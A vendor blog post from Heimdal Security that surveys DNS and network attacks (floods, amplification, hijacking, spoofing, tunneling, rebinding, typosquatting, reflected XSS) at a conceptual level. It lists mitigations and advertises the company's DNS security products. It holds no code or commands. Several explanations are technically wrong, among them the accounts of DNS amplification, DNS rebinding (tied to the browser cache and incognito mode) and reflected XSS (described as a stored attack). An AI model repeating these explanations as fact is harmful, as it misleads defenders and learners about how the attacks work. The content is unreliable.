On the Anatomy of a DNS Attack – Types, Technical Capabilities, and Mitigation

The Domain Name System (DNS), with its quirks, kinks, and compulsion to create unnecessarily long acronyms is a world of its own (design). At this point, any DNS treatise, article, paper, or cheat sheet, makes Encyclopedia Britannica’s letter “A” volume look like a “quit smoking” leaflet.

There’s a perfectly sound reason behind DNS’s complexity – everything happening on your web browser right now, including you reading this article, is the Domain Name System weaving its magic. The article you’re about to read is entirely dedicated to your friendly neighborhood hacker; probably the only person that can turn something as innocuous as an intelligent cooker into a full-fledged IED.

So, without further ado, let’s take a closer look at the DNS attack. I’ll be covering classification, techniques, and available mitigation and fixes. Enjoy!

Common Types of DNS Attacks

#1 Denial-of-Service (DoS)

As far as descriptive acronyms go, DoS manages to capture the essence of this type of cyber-attack. Short for Denial-of-Service, this attack is aimed at barring users from a machine or a network by either exhausting its resources or effectively shutting it down. A least known fact about DoS(s) is that this type of action on target is mostly used to either hide tracks or to hamper the victim’s recovery efforts.

This would be the cherry on top. As far as variety is concerned, there are several kinds of DoS attacks, each levering a vulnerability or protocol\system\code limitation or…unexpected machine-side replies. DoS attacks are commonly employed by threat actors hunting down HVTs with advanced cyber protection.

DNS Amplification

A technique used in DoS attacks to take advantage of the Domain Name System and increase traffic to target sites is DNS amplification. Other names for this attack technique include DNS reflection and address forging. The culprit carries it out by sending faked IP packets to a Domain Name System server with requests for the target’s domain name but using the target’s IP addresses in place of his own.

All of these queries are answered by the DNS server with the IP address of the targeted machine. The server of the victim then sends an identical answer to each request. This results in enormous amounts of data traffic arriving from the victim’s network on port 80 or 25.

Resource Depletion

First on the list is the so-called resource depletion DoS attack. Yup, you’ve guessed it – the attacker aims to trigger a DoS type of response in the victim’s machine by depleting the device’s resource pools: CPU, memory, disk, and network.

For instance, the attacker can drive up the CPU consumption of a forum-type application hosted on a server by bombarding the victim with intricate REGEX queries using a self-launching script that loops those queries.

Memory depletion is another type of Resource Depletion DoS attack – think about vulnerable email agents. A threat actor could trigger a memory depletion attack just by uploading hundreds of thousands of attachments to a draft mail.

Since unsent emails are stored locally, filling them to the bring with junk could exhaust the machine’s memory. How about disk depletion? Well, as you know, most apps produce logs which are pretty useful for figuring out what went wrong with an app. Logs take up just a few kilobytes.

However, by knowing which ‘buttons’ to push to recreate a specific error, the threat actor can force the application to fill up all the available disk space with logs. Sure, takes a lot of time, consideration, research, and resources on both sides, but it can be done.

Buffer Overflow

A type of vulnerability or rather limitation exploitation attack, BOA (Buffer Overflow Attack) aims to force the system to write memory to a nearby buffer instead of the intended spot. When the memory’s written in the buffer instead of the ‘regular’ place, it causes the application leveraging that memory to crash. This type of limitation is endemic to C-written applications.

Buffer overflow attacks can also be employed for purposes other than DoS. For instance, an attacker can potentially tamper with or replace values in either the base pointer or the indicator pointer to execute malicious code.

ICMP Flood

Also called a ping flood, this kind of DoS attack abuses a common connectivity test for crashing, freezing, rebooting, or rendering the target machine inoperable. Conventionally, the ICMP ping test is used to ascertain the strength of connectivity between two endpoints operating on the same network.

How this works is that a machine sends an ICMP echo request to another machine. In turn, the receiver sends back an echo reply. By measuring the round-trip, you can determine the connection’s strength.

As you would imagine, an attacker can abuse the ICMP echo request-reply mechanism to overload the victim’s network. Although it may sound like a good place to start if you were to DoS a target, the attack itself does have some requirements: the attacker’s bandwidth must be larger than the victim’s bandwidth.

More than that, the attacker must know the victim’s IP address to focus the attack. And, on top of that, the attacker must also dig up information on the victim’s router.

SYN Flood

Also called a “half-open” attack, the SYN flood abuses the TCP\IP three-way handshake mechanism.

I already covered the three-way handshake mechanism in a previous article. The way this works is that the attacker will trigger a deny user response in the server by repeatedly sending SYN packets and disregarding SYN-ACK, server-side packages.

#2 Distributed Denial-of-Service (DDoS)

DDoS is to volume, as DoS is to precision. Distributed Denial-of-Service attacks leveraged compromised hosts (bots) to launch full-scale DoS-type attacks on large targets. So, non-technically speaking, DoS is the lone wolf, striking with surgical precision, while DDoS is the general, who orders his soldiers into battle.

DDoS attacks occur more frequently compared to simple DoS attacks. Why? Bots and botnets are readily available on the dark web and volumetric attacks have higher odds of success compared to DoS. Enough about that – let’s see some types of DDoS attacks.

UDP Flood

Fairly similar to the SYN flood, this type of DDoS leverages the User Datagram Protocol (UDP) and UDP packets. The attacker will flood the user’s opened ports with a bunch of junk UDP packets.

Thinking that these are legit UDP comm attempts, the host will attempt to listen on that port in search of the app sending those UDP packets. With no packets found, the host will have no choice but to reply with an ICMP unreachable destination packet. Well, as you would imagine this goes on and on until the host’s network resources are exhausted.

ICMP Flood

Works the same way as the DoS counterpart. The only difference here is volume – DDoS attacks have the advantage of hundreds or thousands of bots capable of ICMP flooding the victim at the same time.

SYN Flood

Same DoS mechanism, but more ‘zombies’ to do the heavy lifting.

NTP Amplification

In Network Time Protocol (NTP) attacks the threat actor bombards public-facing NTP servers with UDP packets for DoS purposes. The name of the attack is given by how attackers exploit the so-called query-to-response ratio. The NTP server crashes when it’s no longer able to resolve all the queries received from the attacker.

HTTP flood

Very efficient DDoS attack, levering the GET or POST reply-response mechanisms. What happens is that the threat actor sends as many legitimately GET or POST queries to the server, forcing it to answer each one of them. This resource-intensive replying process depletes server resources resulting in DoS.

Fast Flux

Fast flux is a very flashy and Tron-reminiscing name for masking botnets. Technically, it’s not an attack but rather an evasion method employed by botnet operators to avoid detection. With fast flux, threat actors can quickly change between compromised hosts, rendering them invisible to detection tools.

Reflected Cross-Site Scripting (XSS)

During a reflected cross-Site scripting attack (XSS), the threat actor seeks to abuse the HTPP response issued by an application receiving a request, kind of like an echo. The point of this is to discover whether or not an application receiving an HTTP request performs any kind of data checks upon receiving a query.

Here’s a quick example of this – some websites mirror back your search terms. So, if you search for something like “cat food”, you may receive a response such as <<you search for: “cat food”>>. Now, in unsecured websites, threat actors could leverage this improper data processing praxis to append malicious arguments in the URL, resulting in an XSS attack.

The best thing about this: the attacker is not the one actually executing the attack. The blow would be dealt by the next user who searches for something on the website.

#3 DNS Hijacking

When a DNS hijacking attack takes place, a cyberattacker manipulates a query’s resolution, causing it to be maliciously redirected to a compromised server that they control. By doing so, hackers can trick visitors into stumbling upon an infected website without their knowledge. This is also known as DNS poisoning or DNS redirection.

Unfortunately, DNS hijacking attacks are also very common in the realm of cybercrime. A 2021 study found that 47% of companies that responded said they had experienced this kind of attack, and 33% also noted cache poisoning, which is essentially the same thing as DNS hijacking.

A DNS hijacking operation may also involve subversion or changing a reliable DNS server’s behavior. This may be done by reputable sources like your Internet service provider, as well as by hackers running phishing efforts. ISPs do this to gather information for stats, display adverts, and other self-serving uses. Additionally, DNS service providers may use traffic hijacking as a kind of censorship to prevent access to particular pages.

DNS Spoofing

DNS spoofing, also known as DNS cache poisoning, is a method used by cybercriminals to trick you into connecting to a phony website they have built rather than the one you intended to visit. When someone requests to access a website through the Domain Name System and the DNS server responds with an inaccurate IP address, it is considered a DNS spoofing attack.

DNS spoofing can happen on both Microsoft Windows Server and BIND. A hacker may identify the domain you’re attempting to reach, read your message, and give you information leading you to assume you’re on a legitimate website. You would be routed to a fake website that they have put together and that may be infected with malware. However, not just websites are susceptible to this kind of attack. This method can be used by hackers to access email accounts and other private data as well.

DNS Tunneling

Network traffic is routed through the DNS using a method known as DNS tunneling to establish an additional channel for data to travel. It is possible to do this to get through network filters and firewalls, among other things.

The DNS converts domain names into IP addresses. To access websites that are restricted by country or region, users’ connections will route their internet traffic through a distant server when DNS tunneling is enabled. Simply said, since DNS tunneling is not inherently evil, a virtual private network (VPN) can help you with this.

Unfortunately, hackers frequently use this procedure for malicious ends. DNS tunneling, when used maliciously, is an attack strategy in which data is delivered via DNS queries. This can be used to spoof content and avoid filtering or firewall detection, as well as to secretly send data through networks that would normally block such traffic.

DNS Rebinding

DNS rebinding is a cyberattack method that deceives a victim’s browser into contacting a malicious site when it puts in a domain name by taking advantage of the long-standing nature of the browser cache. The attack may be carried out using any internet-connected device, including smartphones, and does not require any kind of authentication. The victim must either disable browsing history or open a browser incognito window to disable the cache.

Using this flaw, the attacker can reroute a victim’s browser’s request for a domain name to a different server hosting harmful material. By altering the victim’s account URL, which forces all requests for this account to go via the attacker’s server, it is also used to take control of social media accounts.

For example, when you input www.mybankname.com into your browser address bar on a home computer and wish to see your bank’s website, it may go someplace else because someone else has hijacked it using DNS rebinding.

DNS Typosquatting

A social engineering attack technique inspired by DNS hijacking, DNS typosquatting takes the use of typos and misspellings in domain names. A common DNS typosquatting assault starts with the attacker registering a domain name that is purposefully misspelled or seems to be close to the target website’s domain name.

The attacker then develops a false website with material designed to persuade users to provide sensitive information including login passwords, credit card details, and other personal information. Using www.paypall.com or www.applid.com in place of www.paypal would be two examples of typosquatting websites (instead of appleid).

Antivirus is no longer enough to keep an organization’s systems secure.

Heimdal® DNS Security Solution

Is our next gen proactive DNS-Layer security that stops unknown threats before they reach your endpoints.

• Machine learning powered scans for all incoming online traffic;
• Stops data breaches before sensitive info can be exposed to the outside;
• Advanced DNS, HTTP and HTTPS filtering for all your endpoints;
• Protection against data leakage, APTs, ransomware and exploits;

Try it for FREE today 30-day Free Trial. Offer valid only for companies.

How to Mitigate DNS Attacks

All of these attacks can severely disrupt operations, not to mention the fact that some DDoS and ransomware operators can destroy the data, device, or both after the attack’s done. So, let’s see about mitigation.

DoS Attack Mitigation

• Use legitimate cloud-based hosting.
• Implement availability monitoring.
• Don’t forget about registrar locking.
• Invest in an IDS\IPS tool.
• Complete automatic static and dynamic analysis.
• When in doubt, resort to the fuzz testing technique.
• Implement data execution prevention.
• Ensure that coding is secure.
• Take advantage of the compiler warning.
• Stack canaries.
• Curb the processing limit of inbound ICMP messages.
• Put perimeter firewall fine-tuning into use.
• Use the oldest half-open TCP\IP connection once the backlog’s full.
• Don’t forget about SYN cookies.

DDoS Attack Mitigation

• Perform deep-packet inspection.
• Put traffic-scrubbing filters into effect.
• Keep the “worst is yet to come” rule in mind. Most DDoS attacks come in waves. The first wave is the attacker testing out defenses. Be sure to expect a second and even a third wave.
• Curb system response rate of ICMP packets.
• Perform regular traffic profiling.
• Keep IP reputation in mind.
• Execute JavaScript parsing.
• Verify IP sources.
• Disable monlist.
• Implement an access control
• Apply cyber-awareness practices such as not clicking on suspicious links, not opening emails from untrusted or unknown sources, etc.
• Use a web application firewall.

DNS Hijacking Attack Mitigation

• Shut down unneeded DNS resolvers.
• Place legitimate DNS resolvers behind a firewall and ensure they cannot be accessed outside of your organization.
• Separate your authoritative name server from the DNS resolver.
• Apply patches for known vulnerabilities as soon as they are released by their respective developers.
• Implement client lock on your DNS registrar.
• Ensure that your organization is using a DNS registrar with DNSSEC support.
• Always enable DNSSEC.
• Use an encrypted VPN connection for your enterprise.
• Implement a router password hygiene policy.

One more thing before I go – coverage. The methods illustrated in the previous section can protect you only to a certain extent. Beyond that point, protection mostly falls into the trial-and-error zone.

For that extra ounce of protection, you should give Heimdal™ Threat Prevention Endpoint a try – DNS traffic filtering, deep-packet inspection, and everything you can think of in terms of DNS attack prevention at your fingertips. Hope you’ve enjoyed this little repartee and, as always, stay safe, stay frosty, and reach out if you have any more questions.

Newsletter

If you liked this post, you will enjoy our newsletter.

Get cybersecurity updates you'll actually want to read directly in your inbox.

I agree to have the submitted data processed by Heimdal Security according to the Privacy Policy

Alina Georgiana Petcu

Product Marketing Manager

Alina Georgiana Petcu is a Product Marketing Manager within Heimdal™ Security and her main interest lies in institutional cybersecurity. In her spare time, Alina is also an avid malware historian who loves nothing more than to untangle the intricate narratives behind the world's most infamous cyberattacks.